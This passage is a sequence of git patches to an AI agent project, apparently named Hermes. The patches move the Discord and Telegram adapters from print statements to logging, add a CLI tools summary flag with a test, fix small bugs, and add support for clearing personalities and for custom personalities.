Date: Mon, 9 Mar 2026 14:33:21 +0300
Subject: [PATCH 015/105] Improve Discord gateway error handling and logging

---
 gateway/platforms/discord.py | 56 ++++++++++++++++++++++--------------
 1 file changed, 34 insertions(+), 22 deletions(-)

diff --git a/gateway/platforms/discord.py b/gateway/platforms/discord.py
index 905e20d6..1f0b0899 100644
--- a/gateway/platforms/discord.py
+++ b/gateway/platforms/discord.py
@@ -72,11 +72,11 @@ class DiscordAdapter(BasePlatformAdapter):
     async def connect(self) -> bool:
         """Connect to Discord and start receiving events."""
         if not DISCORD_AVAILABLE:
-            print(f"[{self.name}] discord.py not installed. Run: pip install discord.py")
+            logger.error("[%s] discord.py not installed. Run: pip install discord.py", self.name)
             return False
         
         if not self.config.token:
-            print(f"[{self.name}] No bot token configured")
+            logger.error("[%s] No bot token configured", self.name)
             return False
         
         try:
@@ -105,7 +105,7 @@ class DiscordAdapter(BasePlatformAdapter):
             # Register event handlers
             @self._client.event
             async def on_ready():
-                print(f"[{adapter_self.name}] Connected as {adapter_self._client.user}")
+                logger.info("[%s] Connected as %s", adapter_self.name, adapter_self._client.user)
                 
                 # Resolve any usernames in the allowed list to numeric IDs
                 await adapter_self._resolve_allowed_usernames()
@@ -113,9 +113,9 @@ class DiscordAdapter(BasePlatformAdapter):
                 # Sync slash commands with Discord
                 try:
                     synced = await adapter_self._client.tree.sync()
-                    print(f"[{adapter_self.name}] Synced {len(synced)} slash command(s)")
-                except Exception as e:
-                    print(f"[{adapter_self.name}] Slash command sync failed: {e}")
+                    logger.info("[%s] Synced %d slash command(s)", adapter_self.name, len(synced))
+                except Exception as e:  # pragma: no cover - defensive logging
+                    logger.warning("[%s] Slash command sync failed: %s", adapter_self.name, e, exc_info=True)
                 adapter_self._ready_event.set()
             
             @self._client.event
@@ -138,10 +138,10 @@ class DiscordAdapter(BasePlatformAdapter):
             return True
             
         except asyncio.TimeoutError:
-            print(f"[{self.name}] Timeout waiting for connection")
+            logger.error("[%s] Timeout waiting for connection to Discord", self.name, exc_info=True)
             return False
-        except Exception as e:
-            print(f"[{self.name}] Failed to connect: {e}")
+        except Exception as e:  # pragma: no cover - defensive logging
+            logger.error("[%s] Failed to connect to Discord: %s", self.name, e, exc_info=True)
             return False
     
     async def disconnect(self) -> None:
@@ -149,13 +149,13 @@ class DiscordAdapter(BasePlatformAdapter):
         if self._client:
             try:
                 await self._client.close()
-            except Exception as e:
-                print(f"[{self.name}] Error during disconnect: {e}")
+            except Exception as e:  # pragma: no cover - defensive logging
+                logger.warning("[%s] Error during disconnect: %s", self.name, e, exc_info=True)
         
         self._running = False
         self._client = None
         self._ready_event.clear()
-        print(f"[{self.name}] Disconnected")
+        logger.info("[%s] Disconnected", self.name)
     
     async def send(
         self,
@@ -204,7 +204,8 @@ class DiscordAdapter(BasePlatformAdapter):
                 raw_response={"message_ids": message_ids}
             )
             
-        except Exception as e:
+        except Exception as e:  # pragma: no cover - defensive logging
+            logger.error("[%s] Failed to send Discord message: %s", self.name, e, exc_info=True)
             return SendResult(success=False, error=str(e))
 
     async def edit_message(
@@ -226,7 +227,8 @@ class DiscordAdapter(BasePlatformAdapter):
                 formatted = formatted[:self.MAX_MESSAGE_LENGTH - 3] + "..."
             await msg.edit(content=formatted)
             return SendResult(success=True, message_id=message_id)
-        except Exception as e:
+        except Exception as e:  # pragma: no cover - defensive logging
+            logger.error("[%s] Failed to edit Discord message %s: %s", self.name, message_id, e, exc_info=True)
             return SendResult(success=False, error=str(e))
 
     async def send_voice(
@@ -263,8 +265,8 @@ class DiscordAdapter(BasePlatformAdapter):
                 )
                 return SendResult(success=True, message_id=str(msg.id))
         
-        except Exception as e:
-            print(f"[{self.name}] Failed to send audio: {e}")
+        except Exception as e:  # pragma: no cover - defensive logging
+            logger.error("[%s] Failed to send audio, falling back to base adapter: %s", self.name, e, exc_info=True)
             return await super().send_voice(chat_id, audio_path, caption, reply_to)
     
     async def send_image_file(
@@ -300,8 +302,8 @@ class DiscordAdapter(BasePlatformAdapter):
                 )
                 return SendResult(success=True, message_id=str(msg.id))
         
-        except Exception as e:
-            print(f"[{self.name}] Failed to send local image: {e}")
+        except Exception as e:  # pragma: no cover - defensive logging
+            logger.error("[%s] Failed to send local image, falling back to base adapter: %s", self.name, e, exc_info=True)
             return await super().send_image_file(chat_id, image_path, caption, reply_to)
 
     async def send_image(
@@ -353,10 +355,19 @@ class DiscordAdapter(BasePlatformAdapter):
                     return SendResult(success=True, message_id=str(msg.id))
         
         except ImportError:
-            print(f"[{self.name}] aiohttp not installed, falling back to URL. Run: pip install aiohttp")
+            logger.warning(
+                "[%s] aiohttp not installed, falling back to URL. Run: pip install aiohttp",
+                self.name,
+                exc_info=True,
+            )
             return await super().send_image(chat_id, image_url, caption, reply_to)
-        except Exception as e:
-            print(f"[{self.name}] Failed to send image attachment, falling back to URL: {e}")
+        except Exception as e:  # pragma: no cover - defensive logging
+            logger.error(
+                "[%s] Failed to send image attachment, falling back to URL: %s",
+                self.name,
+                e,
+                exc_info=True,
+            )
             return await super().send_image(chat_id, image_url, caption, reply_to)
     
     async def send_typing(self, chat_id: str) -> None:
@@ -404,7 +415,8 @@ class DiscordAdapter(BasePlatformAdapter):
                 "guild_id": str(channel.guild.id) if hasattr(channel, "guild") and channel.guild else None,
                 "guild_name": channel.guild.name if hasattr(channel, "guild") and channel.guild else None,
             }
-        except Exception as e:
+        except Exception as e:  # pragma: no cover - defensive logging
+            logger.error("[%s] Failed to get chat info for %s: %s", self.name, chat_id, e, exc_info=True)
             return {"name": str(chat_id), "type": "dm", "error": str(e)}
     
     async def _resolve_allowed_usernames(self) -> None:

From 46a7d6aeb207538717c2063aacc64a700f8d7d9d Mon Sep 17 00:00:00 2001
From: aydnOktay <xaydinoktay@gmail.com>
Date: Mon, 9 Mar 2026 15:58:01 +0300
Subject: [PATCH 016/105] Improve Telegram gateway error handling and logging

---
 gateway/platforms/telegram.py | 147 +++++++++++++++++++++++-----------
 1 file changed, 102 insertions(+), 45 deletions(-)

diff --git a/gateway/platforms/telegram.py b/gateway/platforms/telegram.py
index 4371bfdb..6e7de05b 100644
--- a/gateway/platforms/telegram.py
+++ b/gateway/platforms/telegram.py
@@ -111,11 +111,14 @@ class TelegramAdapter(BasePlatformAdapter):
     async def connect(self) -> bool:
         """Connect to Telegram and start polling for updates."""
         if not TELEGRAM_AVAILABLE:
-            print(f"[{self.name}] python-telegram-bot not installed. Run: pip install python-telegram-bot")
+            logger.error(
+                "[%s] python-telegram-bot not installed. Run: pip install python-telegram-bot",
+                self.name,
+            )
             return False
         
         if not self.config.token:
-            print(f"[{self.name}] No bot token configured")
+            logger.error("[%s] No bot token configured", self.name)
             return False
         
         try:
@@ -169,15 +172,20 @@ class TelegramAdapter(BasePlatformAdapter):
                     BotCommand("reload_mcp", "Reload MCP servers from config"),
                     BotCommand("help", "Show available commands"),
                 ])
-            except Exception as e:
-                print(f"[{self.name}] Could not register command menu: {e}")
+            except Exception as e:  # pragma: no cover - defensive logging
+                logger.warning(
+                    "[%s] Could not register Telegram command menu: %s",
+                    self.name,
+                    e,
+                    exc_info=True,
+                )
             
             self._running = True
-            print(f"[{self.name}] Connected and polling for updates")
+            logger.info("[%s] Connected and polling for Telegram updates", self.name)
             return True
             
-        except Exception as e:
-            print(f"[{self.name}] Failed to connect: {e}")
+        except Exception as e:  # pragma: no cover - defensive logging
+            logger.error("[%s] Failed to connect to Telegram: %s", self.name, e, exc_info=True)
             return False
     
     async def disconnect(self) -> None:
@@ -187,13 +195,13 @@ class TelegramAdapter(BasePlatformAdapter):
                 await self._app.updater.stop()
                 await self._app.stop()
                 await self._app.shutdown()
-            except Exception as e:
-                print(f"[{self.name}] Error during disconnect: {e}")
+            except Exception as e:  # pragma: no cover - defensive logging
+                logger.warning("[%s] Error during Telegram disconnect: %s", self.name, e, exc_info=True)
         
         self._running = False
         self._app = None
         self._bot = None
-        print(f"[{self.name}] Disconnected")
+        logger.info("[%s] Disconnected from Telegram", self.name)
     
     async def send(
         self,
@@ -248,7 +256,8 @@ class TelegramAdapter(BasePlatformAdapter):
                 raw_response={"message_ids": message_ids}
             )
             
-        except Exception as e:
+        except Exception as e:  # pragma: no cover - defensive logging
+            logger.error("[%s] Failed to send Telegram message: %s", self.name, e, exc_info=True)
             return SendResult(success=False, error=str(e))
 
     async def edit_message(
@@ -269,7 +278,7 @@ class TelegramAdapter(BasePlatformAdapter):
                     text=formatted,
                     parse_mode=ParseMode.MARKDOWN_V2,
                 )
-            except Exception:
+            except Exception:  # pragma: no cover - defensive logging
                 # Fallback: retry without markdown formatting
                 await self._bot.edit_message_text(
                     chat_id=int(chat_id),
@@ -277,7 +286,14 @@ class TelegramAdapter(BasePlatformAdapter):
                     text=content,
                 )
             return SendResult(success=True, message_id=message_id)
-        except Exception as e:
+        except Exception as e:  # pragma: no cover - defensive logging
+            logger.error(
+                "[%s] Failed to edit Telegram message %s: %s",
+                self.name,
+                message_id,
+                e,
+                exc_info=True,
+            )
             return SendResult(success=False, error=str(e))
 
     async def send_voice(
@@ -314,8 +330,13 @@ class TelegramAdapter(BasePlatformAdapter):
                         reply_to_message_id=int(reply_to) if reply_to else None,
                     )
             return SendResult(success=True, message_id=str(msg.message_id))
-        except Exception as e:
-            print(f"[{self.name}] Failed to send voice/audio: {e}")
+        except Exception as e:  # pragma: no cover - defensive logging
+            logger.error(
+                "[%s] Failed to send Telegram voice/audio, falling back to base adapter: %s",
+                self.name,
+                e,
+                exc_info=True,
+            )
             return await super().send_voice(chat_id, audio_path, caption, reply_to)
     
     async def send_image_file(
@@ -342,8 +363,13 @@ class TelegramAdapter(BasePlatformAdapter):
                     reply_to_message_id=int(reply_to) if reply_to else None,
                 )
             return SendResult(success=True, message_id=str(msg.message_id))
-        except Exception as e:
-            print(f"[{self.name}] Failed to send local image: {e}")
+        except Exception as e:  # pragma: no cover - defensive logging
+            logger.error(
+                "[%s] Failed to send Telegram local image, falling back to base adapter: %s",
+                self.name,
+                e,
+                exc_info=True,
+            )
             return await super().send_image_file(chat_id, image_path, caption, reply_to)
 
     async def send_image(
@@ -371,7 +397,12 @@ class TelegramAdapter(BasePlatformAdapter):
             )
             return SendResult(success=True, message_id=str(msg.message_id))
         except Exception as e:
-            logger.warning("[%s] URL-based send_photo failed (%s), trying file upload", self.name, e)
+            logger.warning(
+                "[%s] URL-based send_photo failed, trying file upload: %s",
+                self.name,
+                e,
+                exc_info=True,
+            )
             # Fallback: download and upload as file (supports up to 10MB)
             try:
                 import httpx
@@ -387,8 +418,13 @@ class TelegramAdapter(BasePlatformAdapter):
                     reply_to_message_id=int(reply_to) if reply_to else None,
                 )
                 return SendResult(success=True, message_id=str(msg.message_id))
-            except Exception as e2:
-                logger.error("[%s] File upload send_photo also failed: %s", self.name, e2)
+            except Exception as e2:  # pragma: no cover - defensive logging
+                logger.error(
+                    "[%s] File upload send_photo also failed: %s",
+                    self.name,
+                    e2,
+                    exc_info=True,
+                )
                 # Final fallback: send URL as text
                 return await super().send_image(chat_id, image_url, caption, reply_to)
     
@@ -411,8 +447,13 @@ class TelegramAdapter(BasePlatformAdapter):
                 reply_to_message_id=int(reply_to) if reply_to else None,
             )
             return SendResult(success=True, message_id=str(msg.message_id))
-        except Exception as e:
-            print(f"[{self.name}] Failed to send animation, falling back to photo: {e}")
+        except Exception as e:  # pragma: no cover - defensive logging
+            logger.error(
+                "[%s] Failed to send Telegram animation, falling back to photo: %s",
+                self.name,
+                e,
+                exc_info=True,
+            )
             # Fallback: try as a regular photo
             return await self.send_image(chat_id, animation_url, caption, reply_to)
 
@@ -424,8 +465,14 @@ class TelegramAdapter(BasePlatformAdapter):
                     chat_id=int(chat_id),
                     action="typing"
                 )
-            except Exception:
-                pass  # Ignore typing indicator failures
+            except Exception as e:  # pragma: no cover - defensive logging
+                # Typing failures are non-fatal; log at debug level only.
+                logger.debug(
+                    "[%s] Failed to send Telegram typing indicator: %s",
+                    self.name,
+                    e,
+                    exc_info=True,
+                )
     
     async def get_chat_info(self, chat_id: str) -> Dict[str, Any]:
         """Get information about a Telegram chat."""
@@ -451,7 +498,14 @@ class TelegramAdapter(BasePlatformAdapter):
                 "username": chat.username,
                 "is_forum": getattr(chat, "is_forum", False),
             }
-        except Exception as e:
+        except Exception as e:  # pragma: no cover - defensive logging
+            logger.error(
+                "[%s] Failed to get Telegram chat info for %s: %s",
+                self.name,
+                chat_id,
+                e,
+                exc_info=True,
+            )
             return {"name": str(chat_id), "type": "dm", "error": str(e)}
     
     def format_message(self, content: str) -> str:
@@ -640,9 +694,9 @@ class TelegramAdapter(BasePlatformAdapter):
                 cached_path = cache_image_from_bytes(bytes(image_bytes), ext=ext)
                 event.media_urls = [cached_path]
                 event.media_types = [f"image/{ext.lstrip('.')}"]
-                print(f"[Telegram] Cached user photo: {cached_path}", flush=True)
-            except Exception as e:
-                print(f"[Telegram] Failed to cache photo: {e}", flush=True)
+                logger.info("[Telegram] Cached user photo at %s", cached_path)
+            except Exception as e:  # pragma: no cover - defensive logging
+                logger.warning("[Telegram] Failed to cache photo: %s", e, exc_info=True)
         
         # Download voice/audio messages to cache for STT transcription
         if msg.voice:
@@ -652,9 +706,9 @@ class TelegramAdapter(BasePlatformAdapter):
                 cached_path = cache_audio_from_bytes(bytes(audio_bytes), ext=".ogg")
                 event.media_urls = [cached_path]
                 event.media_types = ["audio/ogg"]
-                print(f"[Telegram] Cached user voice: {cached_path}", flush=True)
-            except Exception as e:
-                print(f"[Telegram] Failed to cache voice: {e}", flush=True)
+                logger.info("[Telegram] Cached user voice at %s", cached_path)
+            except Exception as e:  # pragma: no cover - defensive logging
+                logger.warning("[Telegram] Failed to cache voice: %s", e, exc_info=True)
         elif msg.audio:
             try:
                 file_obj = await msg.audio.get_file()
@@ -662,9 +716,9 @@ class TelegramAdapter(BasePlatformAdapter):
                 cached_path = cache_audio_from_bytes(bytes(audio_bytes), ext=".mp3")
                 event.media_urls = [cached_path]
                 event.media_types = ["audio/mp3"]
-                print(f"[Telegram] Cached user audio: {cached_path}", flush=True)
-            except Exception as e:
-                print(f"[Telegram] Failed to cache audio: {e}", flush=True)
+                logger.info("[Telegram] Cached user audio at %s", cached_path)
+            except Exception as e:  # pragma: no cover - defensive logging
+                logger.warning("[Telegram] Failed to cache audio: %s", e, exc_info=True)
 
         # Download document files to cache for agent processing
         elif msg.document:
@@ -689,7 +743,7 @@ class TelegramAdapter(BasePlatformAdapter):
                         f"Unsupported document type '{ext or 'unknown'}'. "
                         f"Supported types: {supported_list}"
                     )
-                    print(f"[Telegram] Unsupported document type: {ext or 'unknown'}", flush=True)
+                    logger.info("[Telegram] Unsupported document type: %s", ext or "unknown")
                     await self.handle_message(event)
                     return
 
@@ -700,7 +754,7 @@ class TelegramAdapter(BasePlatformAdapter):
                         "The document is too large or its size could not be verified. "
                         "Maximum: 20 MB."
                     )
-                    print(f"[Telegram] Document too large: {doc.file_size} bytes", flush=True)
+                    logger.info("[Telegram] Document too large: %s bytes", doc.file_size)
                     await self.handle_message(event)
                     return
 
@@ -712,7 +766,7 @@ class TelegramAdapter(BasePlatformAdapter):
                 mime_type = SUPPORTED_DOCUMENT_TYPES[ext]
                 event.media_urls = [cached_path]
                 event.media_types = [mime_type]
-                print(f"[Telegram] Cached user document: {cached_path}", flush=True)
+                logger.info("[Telegram] Cached user document at %s", cached_path)
 
                 # For text files, inject content into event.text (capped at 100 KB)
                 MAX_TEXT_INJECT_BYTES = 100 * 1024
@@ -726,11 +780,14 @@ class TelegramAdapter(BasePlatformAdapter):
                             event.text = f"{injection}\n\n{event.text}"
                         else:
                             event.text = injection
-                    except UnicodeDecodeError:
-                        print(f"[Telegram] Could not decode text file as UTF-8, skipping content injection", flush=True)
+                    except UnicodeDecodeError:  # pragma: no cover - defensive logging
+                        logger.warning(
+                            "[Telegram] Could not decode text file as UTF-8, skipping content injection",
+                            exc_info=True,
+                        )
 
-            except Exception as e:
-                print(f"[Telegram] Failed to cache document: {e}", flush=True)
+            except Exception as e:  # pragma: no cover - defensive logging
+                logger.warning("[Telegram] Failed to cache document: %s", e, exc_info=True)
 
         await self.handle_message(event)
     
@@ -765,7 +822,7 @@ class TelegramAdapter(BasePlatformAdapter):
             event.text = build_sticker_injection(
                 cached["description"], cached.get("emoji", emoji), cached.get("set_name", set_name)
             )
-            print(f"[Telegram] Sticker cache hit: {sticker.file_unique_id}", flush=True)
+            logger.info("[Telegram] Sticker cache hit: %s", sticker.file_unique_id)
             return
 
         # Cache miss -- download and analyze
@@ -773,7 +830,7 @@ class TelegramAdapter(BasePlatformAdapter):
             file_obj = await sticker.get_file()
             image_bytes = await file_obj.download_as_bytearray()
             cached_path = cache_image_from_bytes(bytes(image_bytes), ext=".webp")
-            print(f"[Telegram] Analyzing sticker: {cached_path}", flush=True)
+            logger.info("[Telegram] Analyzing sticker at %s", cached_path)
 
             from tools.vision_tools import vision_analyze_tool
             import json as _json
@@ -794,8 +851,8 @@ class TelegramAdapter(BasePlatformAdapter):
                     f"a sticker with emoji {emoji}" if emoji else "a sticker",
                     emoji, set_name,
                 )
-        except Exception as e:
-            print(f"[Telegram] Sticker analysis error: {e}", flush=True)
+        except Exception as e:  # pragma: no cover - defensive logging
+            logger.warning("[Telegram] Sticker analysis error: %s", e, exc_info=True)
             event.text = build_sticker_injection(
                 f"a sticker with emoji {emoji}" if emoji else "a sticker",
                 emoji, set_name,

From 59705b80cd8e7a9142c640c5eb60dea06df1bf35 Mon Sep 17 00:00:00 2001
From: luisv-1 <aliaydinali00@gmail.com>
Date: Mon, 9 Mar 2026 16:50:53 +0300
Subject: [PATCH 017/105] Add tools summary flag to Hermes CLI

Made-with: Cursor
---
 hermes_cli/main.py                    |  5 ++++
 hermes_cli/tools_config.py            | 34 +++++++++++++++++++++++++++
 tests/hermes_cli/test_tools_config.py | 11 ++++++++-
 3 files changed, 49 insertions(+), 1 deletion(-)

diff --git a/hermes_cli/main.py b/hermes_cli/main.py
index 861cc038..a36ee28c 100644
--- a/hermes_cli/main.py
+++ b/hermes_cli/main.py
@@ -2244,6 +2244,11 @@ For more help on a command:
         help="Configure which tools are enabled per platform",
         description="Interactive tool configuration — enable/disable tools for CLI, Telegram, Discord, etc."
     )
+    tools_parser.add_argument(
+        "--summary",
+        action="store_true",
+        help="Print a summary of enabled tools per platform and exit"
+    )
 
     def cmd_tools(args):
         from hermes_cli.tools_config import tools_command
diff --git a/hermes_cli/tools_config.py b/hermes_cli/tools_config.py
index 19288bf5..dca35edc 100644
--- a/hermes_cli/tools_config.py
+++ b/hermes_cli/tools_config.py
@@ -308,6 +308,22 @@ def _get_enabled_platforms() -> List[str]:
     return enabled
 
 
+def _platform_toolset_summary(config: dict, platforms: List[str] | None = None) -> Dict[str, Set[str]]:
+    """Return a summary of enabled toolsets per platform.
+
+    When ``platforms`` is None, this uses ``_get_enabled_platforms`` to
+    auto-detect platforms. Tests can pass an explicit list to avoid relying
+    on environment variables.
+    """
+    if platforms is None:
+        platforms = _get_enabled_platforms()
+
+    summary: Dict[str, Set[str]] = {}
+    for pkey in platforms:
+        summary[pkey] = _get_platform_tools(config, pkey)
+    return summary
+
+
 def _get_platform_tools(config: dict, platform: str) -> Set[str]:
     """Resolve which individual toolset names are enabled for a platform."""
     from toolsets import resolve_toolset, TOOLSETS
@@ -874,6 +890,24 @@ def tools_command(args=None, first_install: bool = False, config: dict = None):
     enabled_platforms = _get_enabled_platforms()
 
     print()
+
+    # Non-interactive summary mode for CLI usage
+    if getattr(args, "summary", False):
+        summary = _platform_toolset_summary(config, enabled_platforms)
+        for pkey in enabled_platforms:
+            pinfo = PLATFORMS[pkey]
+            enabled = summary.get(pkey, set())
+            if not enabled:
+                enabled_label = "none"
+            else:
+                labels = []
+                for ts_key in sorted(enabled):
+                    label = next((l for k, l, _ in CONFIGURABLE_TOOLSETS if k == ts_key), ts_key)
+                    labels.append(label)
+                enabled_label = ", ".join(labels)
+            print(color(f"- {pinfo['label']}: {enabled_label}", Colors.DIM))
+        print()
+        return
     print(color("⚕ Hermes Tool Configuration", Colors.CYAN, Colors.BOLD))
     print(color("  Enable or disable tools per platform.", Colors.DIM))
     print(color("  Tools that need API keys will be configured when enabled.", Colors.DIM))
diff --git a/tests/hermes_cli/test_tools_config.py b/tests/hermes_cli/test_tools_config.py
index 1b4d356c..3e64ea08 100644
--- a/tests/hermes_cli/test_tools_config.py
+++ b/tests/hermes_cli/test_tools_config.py
@@ -1,6 +1,6 @@
 """Tests for hermes_cli.tools_config platform tool persistence."""
 
-from hermes_cli.tools_config import _get_platform_tools
+from hermes_cli.tools_config import _get_platform_tools, _platform_toolset_summary
 
 
 def test_get_platform_tools_uses_default_when_platform_not_configured():
@@ -17,3 +17,12 @@ def test_get_platform_tools_preserves_explicit_empty_selection():
     enabled = _get_platform_tools(config, "cli")
 
     assert enabled == set()
+
+
+def test_platform_toolset_summary_uses_explicit_platform_list():
+    config = {}
+
+    summary = _platform_toolset_summary(config, platforms=["cli"])
+
+    assert set(summary.keys()) == {"cli"}
+    assert summary["cli"] == _get_platform_tools(config, "cli")

From 1a10eb8cd9163dbfd247a51f94d00c48fd03dbe2 Mon Sep 17 00:00:00 2001
From: 0xbyt4 <35742124+0xbyt4@users.noreply.github.com>
Date: Mon, 9 Mar 2026 17:15:23 +0300
Subject: [PATCH 018/105] fix: off-by-one in setup toggle selection error
 message

Error message said "between 1 and N+1" for N items, showing a
max value that would itself be rejected. Now correctly says
"between 1 and N".
---
 hermes_cli/setup.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/hermes_cli/setup.py b/hermes_cli/setup.py
index c10caec9..b5b3001e 100644
--- a/hermes_cli/setup.py
+++ b/hermes_cli/setup.py
@@ -243,7 +243,7 @@ def prompt_checklist(title: str, items: list, pre_selected: list = None) -> list
                     else:
                         selected.add(idx)
                 else:
-                    print_error(f"Enter a number between 1 and {len(items) + 1}")
+                    print_error(f"Enter a number between 1 and {len(items)}")
             except ValueError:
                 print_error("Enter a number")
             except (KeyboardInterrupt, EOFError):

From 34f8ac2d8570eb2e7a3e18899c23d3fd53e60b3f Mon Sep 17 00:00:00 2001
From: 0xbyt4 <35742124+0xbyt4@users.noreply.github.com>
Date: Mon, 9 Mar 2026 17:16:26 +0300
Subject: [PATCH 019/105] fix: replace blocking time.sleep with await
 asyncio.sleep in WhatsApp connect

time.sleep(1) inside async def connect() blocks the entire event
loop for 1 second. Replaced with await asyncio.sleep(1) to yield
control back to the event loop while waiting for the killed port
process to release.
---
 gateway/platforms/whatsapp.py | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/gateway/platforms/whatsapp.py b/gateway/platforms/whatsapp.py
index 285a89ee..00675f2a 100644
--- a/gateway/platforms/whatsapp.py
+++ b/gateway/platforms/whatsapp.py
@@ -181,8 +181,8 @@ class WhatsAppAdapter(BasePlatformAdapter):
             
             # Kill any orphaned bridge from a previous gateway run
             _kill_port_process(self._bridge_port)
-            import time
-            time.sleep(1)
+            import asyncio
+            await asyncio.sleep(1)
             
             # Start the bridge process in its own process group.
             # Route output to a log file so QR codes, errors, and reconnection

From 58b756f04c26edc79ccc1e8ff8b27e1c33da1120 Mon Sep 17 00:00:00 2001
From: 0xbyt4 <35742124+0xbyt4@users.noreply.github.com>
Date: Mon, 9 Mar 2026 17:17:10 +0300
Subject: [PATCH 020/105] fix: clean up empty file after failed wl-paste
 clipboard extraction

When wl-paste produces empty output, the destination file was left
on disk as a 0-byte orphan. Now explicitly removed before returning
False.
---
 hermes_cli/clipboard.py | 1 +
 1 file changed, 1 insertion(+)

diff --git a/hermes_cli/clipboard.py b/hermes_cli/clipboard.py
index 6373cfc8..bdead70b 100644
--- a/hermes_cli/clipboard.py
+++ b/hermes_cli/clipboard.py
@@ -254,6 +254,7 @@ def _wayland_save(dest: Path) -> bool:
             )
 
         if not dest.exists() or dest.stat().st_size == 0:
+            dest.unlink(missing_ok=True)
             return False
 
         # BMP needs conversion to PNG (common in WSLg where only BMP

From c3cf88b202fcb579052e3462f89b0d52a1c5171c Mon Sep 17 00:00:00 2001
From: teyrebaz33 <hakanerten02@hotmail.com>
Date: Mon, 9 Mar 2026 17:18:09 +0300
Subject: [PATCH 021/105] feat(cli,gateway): add /personality none and custom
 personality support
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Closes #643

Changes:
- /personality none|default|neutral — clears system prompt overlay
- Custom personalities in config.yaml support dict format with:
  name, description, system_prompt, tone, style directives
- Backwards compatible — existing string format still works
- CLI + gateway both updated
- 18 tests covering none/default/neutral, dict format, string format,
  list display, save to config
---
 cli.py                         |  34 +++++-
 gateway/run.py                 |  33 ++++-
 hermes_cli/config.py           |   4 +
 tests/test_personality_none.py | 212 +++++++++++++++++++++++++++++++++
 4 files changed, 275 insertions(+), 8 deletions(-)
 create mode 100644 tests/test_personality_none.py

diff --git a/cli.py b/cli.py
index 937966b0..3ecde426 100755
--- a/cli.py
+++ b/cli.py
@@ -1877,6 +1877,19 @@ class HermesCLI:
             print("    /personality    - Use a predefined personality")
             print()
     
+
+    @staticmethod
+    def _resolve_personality_prompt(value) -> str:
+        """Accept string or dict personality value; return system prompt string."""
+        if isinstance(value, dict):
+            parts = [value.get("system_prompt", "")]
+            if value.get("tone"):
+                parts.append(f'Tone: {value["tone"]}' )
+            if value.get("style"):
+                parts.append(f'Style: {value["style"]}' )
+            return "\n".join(p for p in parts if p)
+        return str(value)
+
     def _handle_personality_command(self, cmd: str):
         """Handle the /personality command to set predefined personalities."""
         parts = cmd.split(maxsplit=1)
@@ -1885,8 +1898,16 @@ class HermesCLI:
             # Set personality
             personality_name = parts[1].strip().lower()
             
-            if personality_name in self.personalities:
-                self.system_prompt = self.personalities[personality_name]
+            if personality_name in ("none", "default", "neutral"):
+                self.system_prompt = ""
+                self.agent = None  # Force re-init
+                if save_config_value("agent.system_prompt", ""):
+                    print("(^_^)b Personality cleared (saved to config)")
+                else:
+                    print("(^_^) Personality cleared (session only)")
+                print("  No personality overlay — using base agent behavior.")
+            elif personality_name in self.personalities:
+                self.system_prompt = self._resolve_personality_prompt(self.personalities[personality_name])
                 self.agent = None  # Force re-init
                 if save_config_value("agent.system_prompt", self.system_prompt):
                     print(f"(^_^)b Personality set to '{personality_name}' (saved to config)")
@@ -1895,7 +1916,7 @@ class HermesCLI:
                 print(f"  \"{self.system_prompt[:60]}{'...' if len(self.system_prompt) > 60 else ''}\"")
             else:
                 print(f"(._.) Unknown personality: {personality_name}")
-                print(f"  Available: {', '.join(self.personalities.keys())}")
+                print(f"  Available: none, {', '.join(self.personalities.keys())}")
         else:
             # Show available personalities
             print()
@@ -1903,8 +1924,13 @@ class HermesCLI:
             print("|" + " " * 12 + "(^o^)/ Personalities" + " " * 15 + "|")
             print("+" + "-" * 50 + "+")
             print()
+            print(f"  {'none':<12} - (no personality overlay)")
             for name, prompt in self.personalities.items():
-                print(f"  {name:<12} - \"{prompt}\"")
+                if isinstance(prompt, dict):
+                    preview = prompt.get("description") or prompt.get("system_prompt", "")[:50]
+                else:
+                    preview = str(prompt)[:50]
+                print(f"  {name:<12} - {preview}")
             print()
             print("  Usage: /personality <name>")
             print()
diff --git a/gateway/run.py b/gateway/run.py
index b32f2d2d..8fbd8d28 100644
--- a/gateway/run.py
+++ b/gateway/run.py
@@ -1536,14 +1536,39 @@ class GatewayRunner:
 
         if not args:
             lines = ["🎭 **Available Personalities**\n"]
+            lines.append("• `none` — (no personality overlay)")
             for name, prompt in personalities.items():
-                preview = prompt[:50] + "..." if len(prompt) > 50 else prompt
+                if isinstance(prompt, dict):
+                    preview = prompt.get("description") or prompt.get("system_prompt", "")[:50]
+                else:
+                    preview = prompt[:50] + "..." if len(prompt) > 50 else prompt
                 lines.append(f"• `{name}` — {preview}")
             lines.append(f"\nUsage: `/personality <name>`")
             return "\n".join(lines)
 
-        if args in personalities:
-            new_prompt = personalities[args]
+        def _resolve_prompt(value):
+            if isinstance(value, dict):
+                parts = [value.get("system_prompt", "")]
+                if value.get("tone"):
+                    parts.append(f'Tone: {value["tone"]}')
+                if value.get("style"):
+                    parts.append(f'Style: {value["style"]}')
+                return "\n".join(p for p in parts if p)
+            return str(value)
+
+        if args in ("none", "default", "neutral"):
+            try:
+                if "agent" not in config or not isinstance(config.get("agent"), dict):
+                    config["agent"] = {}
+                config["agent"]["system_prompt"] = ""
+                with open(config_path, "w") as f:
+                    yaml.dump(config, f, default_flow_style=False, sort_keys=False)
+            except Exception as e:
+                return f"⚠️ Failed to save personality change: {e}"
+            self._ephemeral_system_prompt = ""
+            return "🎭 Personality cleared — using base agent behavior.\n_(takes effect on next message)_"
+        elif args in personalities:
+            new_prompt = _resolve_prompt(personalities[args])
 
             # Write to config.yaml, same pattern as CLI save_config_value.
             try:
@@ -1560,7 +1585,7 @@ class GatewayRunner:
 
             return f"🎭 Personality set to **{args}**\n_(takes effect on next message)_"
 
-        available = ", ".join(f"`{n}`" for n in personalities.keys())
+        available = "`none`, " + ", ".join(f"`{n}`" for n in personalities.keys())
         return f"Unknown personality: `{args}`\n\nAvailable: {available}"
     
     async def _handle_retry_command(self, event: MessageEvent) -> str:
diff --git a/hermes_cli/config.py b/hermes_cli/config.py
index 0e6f51c1..1695f2b0 100644
--- a/hermes_cli/config.py
+++ b/hermes_cli/config.py
@@ -147,6 +147,10 @@ DEFAULT_CONFIG = {
 
     # Permanently allowed dangerous command patterns (added via "always" approval)
     "command_allowlist": [],
+    # Custom personalities — add your own entries here
+    # Supports string format: {"name": "system prompt"}
+    # Or dict format: {"name": {"description": "...", "system_prompt": "...", "tone": "...", "style": "..."}}
+    "personalities": {},
 
